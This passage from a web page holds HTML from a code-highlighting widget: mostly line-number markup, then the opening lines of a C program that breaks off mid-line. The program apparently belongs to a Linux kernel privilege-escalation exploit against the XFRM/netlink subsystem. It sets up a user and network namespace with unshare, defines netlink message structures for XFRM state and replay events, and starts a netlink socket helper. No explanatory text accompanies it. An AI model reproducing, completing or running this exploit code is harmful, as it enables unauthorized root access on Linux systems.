class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-180\">180<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-181\">181<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-182\">182<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-183\">183<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-184\">184<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-185\">185<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-186\">186<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-187\">187<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-188\">188<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-189\">189<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-190\">190<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-191\">191<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-192\">192<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-193\">193<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-194\">194<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-195\">195<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-196\">196<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-197\">197<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-198\">198<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-199\">199<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-5bad57622f389003567142-200\">200<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-201\">201<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-202\">202<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-203\">203<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-204\">204<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-205\">205<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-206\">206<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-207\">207<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-208\">208<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-209\">209<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-210\">210<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-211\">211<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-212\">212<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-213\">213<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-214\">214<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-215\">215<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-216\">216<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-217\">217<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-218\">218<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-219\">219<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-220\">220<\/div>\n<div class=\"crayon-num\" 
data-line=\"crayon-5bad57622f389003567142-221\">221<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-222\">222<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-223\">223<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-224\">224<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-225\">225<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-226\">226<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-227\">227<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-228\">228<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-229\">229<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-230\">230<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-231\">231<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-232\">232<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-233\">233<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-234\">234<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-235\">235<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-236\">236<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-237\">237<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-238\">238<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-239\">239<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-240\">240<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-241\">241<\/div>\n<div class=\"crayon-num 
crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-242\">242<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-243\">243<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-244\">244<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-245\">245<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-246\">246<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-247\">247<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-248\">248<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-249\">249<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-250\">250<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-251\">251<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-252\">252<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-253\">253<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-254\">254<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-255\">255<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-256\">256<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-257\">257<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-258\">258<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-259\">259<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-260\">260<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-261\">261<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-262\">262<\/div>\n<div 
class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-263\">263<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-264\">264<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-265\">265<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-266\">266<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-267\">267<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-268\">268<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-269\">269<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-270\">270<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-271\">271<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-272\">272<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-273\">273<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-274\">274<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-275\">275<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-276\">276<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-277\">277<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-278\">278<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-279\">279<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-280\">280<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-281\">281<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-282\">282<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-283\">283<\/div>\n<div 
class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-284\">284<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-285\">285<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-286\">286<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-287\">287<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-288\">288<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-289\">289<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-290\">290<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-291\">291<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-292\">292<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-293\">293<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-294\">294<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-295\">295<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-296\">296<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-297\">297<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-298\">298<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-299\">299<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-300\">300<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-301\">301<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-302\">302<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-303\">303<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-5bad57622f389003567142-304\">304<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-305\">305<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-306\">306<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-307\">307<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-308\">308<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-309\">309<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-310\">310<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-311\">311<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-312\">312<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-313\">313<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-314\">314<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-315\">315<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-316\">316<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-317\">317<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-318\">318<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-319\">319<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-320\">320<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-321\">321<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-322\">322<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-323\">323<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px 
!important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-1\"><span class=\"crayon-p\">#define _GNU_SOURCE<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-2\"><span class=\"crayon-p\">#include &lt;stdarg.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-3\"><span class=\"crayon-p\">#include &lt;stdint.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-4\"><span class=\"crayon-p\">#include &lt;stdio.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-5\"><span class=\"crayon-p\">#include &lt;string.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-6\"><span class=\"crayon-p\">#include &lt;time.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-7\"><span class=\"crayon-p\">#include &lt;stdlib.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-8\"><span class=\"crayon-p\">#include &lt;sys\/socket.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-9\"><span class=\"crayon-p\">#include &lt;sys\/types.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-10\"><span class=\"crayon-p\">#include &lt;sys\/wait.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-11\"><span class=\"crayon-p\">#include &lt;sys\/stat.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-12\"><span class=\"crayon-p\">#include &lt;netinet\/in.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-13\"><span class=\"crayon-p\">#include &lt;arpa\/inet.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5bad57622f389003567142-14\"><span class=\"crayon-p\">#include &lt;linux\/netlink.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-15\"><span class=\"crayon-p\">#include &lt;linux\/xfrm.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-16\"><span class=\"crayon-p\">#include &lt;linux\/irda.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-17\"><span class=\"crayon-p\">#include &lt;fcntl.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-18\"><span class=\"crayon-p\">#include &lt;sched.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-19\"><span class=\"crayon-p\">#include &lt;unistd.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-20\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-21\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-22\"><span class=\"crayon-p\">#define NLA_LENGTH(len)\t\t\t\t\t\\<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">NLA_ALIGN<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nlattr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\"
id=\"crayon-5bad57622f389003567142-24\"><span class=\"crayon-p\">#define NLMSG_TAIL(nmsg)\t\t\t\t\t\t\\<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nlattr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">nmsg<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">NLMSG_ALIGN<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">nmsg<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">nlmsg_len<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-26\"><span class=\"crayon-p\">#define NLA_DATA(nla)\t\t\t\t\t\\<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span
class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">nla<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">NLA_LENGTH<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-28\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-29\"><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">saddr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;1111111122222222&quot;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-30\"><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">daddr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;3333333344444444&quot;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-31\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-32\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sockaddr_nl <\/span><span class=\"crayon-v\">addr<\/span><span
class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-33\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">req_newae<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-34\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">nlmsghdr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-35\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">xfrm_aevent_id <\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-36\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2048<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-37\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-38\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-39\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">req_newsa<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-40\"><span class=\"crayon-h\">\t<\/span><span 
class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">nlmsghdr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-41\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">xfrm_usersa_info <\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-42\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2048<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-43\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-44\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-45\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">create_ns<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-46\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-47\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">unshare<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">CLONE_NEWUSER<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-v\">CLONE_NEWNET<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-48\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;unshare(CLONE_NEWUSER)&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-49\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-50\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-51\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-52\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-53\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">create_netlink_socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-54\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-55\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span
